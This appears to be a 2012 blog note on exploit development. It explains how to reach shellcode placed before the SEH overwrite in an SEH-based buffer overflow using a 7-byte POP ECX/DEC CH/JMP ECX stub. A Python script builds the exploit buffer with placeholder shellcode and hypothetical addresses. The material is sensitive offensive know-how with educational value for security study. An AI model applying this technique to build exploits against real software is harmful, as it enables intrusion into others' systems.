Saturday, March 17, 2012

Limited Shellcode Space (SEH based BOF example)

Just a quick note in case I run into this situation again. While writing an exploit, I wanted to place a shellcode but the space available after the SEH overwrite was not enough (e.g. below 20 bytes), while there was still plenty of space in front of the buffer (before the bytes that overwrite the SE handler). For example, in an SEH-based buffer overflow:

junk1= 'A'*500
junk2=  'A'*12
buffy=  junk1 + nseh + seh + '\x90'*8 + junk2

So we need to jump back to a point before the shellcode. For example, if our shellcode is 200 bytes, the buffer will be:

buffy =  'A'*300 + shellcode + nseh + seh +  '\x90'*8 + junk2

We need to jump back at least 200 bytes from nseh to reach the start of the shellcode, so it is safest to jump back a bit further and land in the 'A' padding of junk1 (0x41 decodes as INC ECX, which is harmless, so execution slides forward into the shellcode). The bytes in junk2 have to make that jump. We can use DEC CH, which decrements the high byte of CX, i.e. subtracts 256 from ECX (caveat: this only holds while CH is not already 0; if CH is 0 it wraps to 0xFF with no borrow into the upper word, so ECX grows by 0xFF00 instead of shrinking by 0x100; check the value of ECX in the debugger first). Before that, ECX has to hold a useful address: after the POP, POP, RETN, the stack slot three places down from ESP holds a pointer to the SEH record, i.e. the address of nseh, which is exactly where the RETN landed (verify this slot in the debugger; it depends on the exception dispatcher's frame). Three POP ECX instructions load that pointer into ECX, DEC CH moves it back 256 bytes, and JMP ECX jumps there, 256 bytes before the spot the POP, POP, RETN landed on. With a 200-byte shellcode that is 56 bytes before the shellcode, inside the 'A' padding.

So here is what we do:

POP ECX \x59
POP ECX \x59
POP ECX \x59
DEC CH \xfe\xcd
JMP ECX \xff\xe1

The stub that goes into junk2 is only 7 bytes long ("\x59\x59\x59\xfe\xcd\xff\xe1"), while nseh holds a short jump forward over seh into the NOPs, so the buffer becomes:

buffy =  'A'*300 + shellcode + nseh + seh +  '\x90'*13 + "\x59\x59\x59\xfe\xcd\xff\xe1"

Voila!

* If you need to go back approximately 512 bytes, use DEC CH twice (\xfe\xcd\xfe\xcd); the same CH-wrap caveat applies to each decrement, and the padding in front of the shellcode must be large enough to absorb the extra 256 bytes.

** I guess I never wrote about buffer overflows before, because there are so many great articles about them on other sites, but this particular trick I found quite rare.

*** Alternatively, you could use an egg hunter, or a near jump (\xe9 followed by a 32-bit displacement, 5 bytes in total); a short jump (\xeb, 2 bytes) cannot help here because its 8-bit displacement only reaches 128 bytes back.
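To check the layout arithmetic before firing an exploit, here is an added example (mine, not code from the original post) that builds the buffer from the post in Python 3 bytes, decodes the nseh short jump, and models what DEC CH does to ECX, including the CH = 0x00 failure case and the "DEC CH twice" variant. The gadget address and the two stack addresses are constructed, hypothetical values; the post gives no real addresses and these belong to no real target. The model assumes, as the post observes, that the three POP ECX leave the address of nseh in ECX.

```python
import struct

# Added example, not code from the original post. Every address below is a
# constructed, hypothetical value: the post gives no real addresses and these
# belong to no real target.
POP_POP_RET = 0x10023A0C         # hypothetical address of a POP/POP/RETN gadget
NSEH_ADDR = 0x0012FA84           # hypothetical stack address of the SEH record (CH = 0xFA)
NSEH_ADDR_CH_ZERO = 0x0013000C   # hypothetical address whose CH byte is 0x00 (failure case)

# 7-byte stub from the post: POP ECX x3 / DEC CH / JMP ECX
STUB = b"\x59\x59\x59\xfe\xcd\xff\xe1"
# nSEH: short jump (EB 06) over the 4-byte SEH address into the NOP sled
NSEH = b"\xeb\x06\x90\x90"
PAD_BYTE = b"A"                  # 0x41 decodes as INC ECX, a harmless sled


def build_buffer(shellcode, pad_len=300, nop_len=13):
    """Lay out the buffer as in the post: padding, shellcode, nSEH, SEH, NOPs, stub."""
    return (PAD_BYTE * pad_len + shellcode + NSEH
            + struct.pack("<I", POP_POP_RET) + b"\x90" * nop_len + STUB)


def nseh_offset(pad_len, shellcode_len):
    """Offset of the nSEH field inside the buffer (where the RETN lands)."""
    return pad_len + shellcode_len


def short_jump_target(pad_len, shellcode_len):
    """Where the EB xx in nSEH lands: rel8 is relative to the end of the 2-byte instruction."""
    rel8 = NSEH[1]
    return nseh_offset(pad_len, shellcode_len) + 2 + rel8


def dec_ch(ecx):
    """Model x86 DEC CH: only bits 8..15 of ECX change, with no borrow into bits 16..31."""
    ch = (ecx >> 8) & 0xFF
    return (ecx & 0xFFFF00FF) | (((ch - 1) & 0xFF) << 8)


def jmp_ecx_landing(nseh_addr, pad_len, shellcode_len, dec_count=1):
    """Offset into the buffer where JMP ECX lands.

    Assumes (as the post observes) that the three POP ECX leave ECX equal to the
    address of nSEH. Returns (offset, region) with region one of 'pad' (inside the
    INC ECX sled, the desired outcome), 'shellcode' (mid-payload, would corrupt
    execution) or 'outside' (not in the buffer at all).
    """
    buf_base = nseh_addr - nseh_offset(pad_len, shellcode_len)
    ecx = nseh_addr
    for _ in range(dec_count):
        ecx = dec_ch(ecx)
    off = ecx - buf_base
    if 0 <= off < pad_len:
        region = "pad"
    elif pad_len <= off < pad_len + shellcode_len:
        region = "shellcode"
    else:
        region = "outside"
    return off, region


if __name__ == "__main__":
    shellcode = b"\xcc" * 200    # constructed placeholder for a real 200-byte payload
    buf = build_buffer(shellcode)
    tgt = short_jump_target(300, 200)
    print("buffer length:", len(buf))
    print("nSEH short jump lands at offset %d on byte %#x" % (tgt, buf[tgt]))
    print("DEC CH once,  CH=0xFA:", jmp_ecx_landing(NSEH_ADDR, 300, 200))
    print("DEC CH once,  CH=0x00:", jmp_ecx_landing(NSEH_ADDR_CH_ZERO, 300, 200))
    print("DEC CH twice, 600 pad:", jmp_ecx_landing(NSEH_ADDR, 600, 200, dec_count=2))
```

With the post's 300 + 200 layout, a single DEC CH lands at offset 244, 56 bytes of INC ECX before the shellcode; when CH happens to be 0x00 the same stub sends ECX 0xFF00 bytes the wrong way, which is why the register is worth inspecting in the debugger before relying on this trick.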
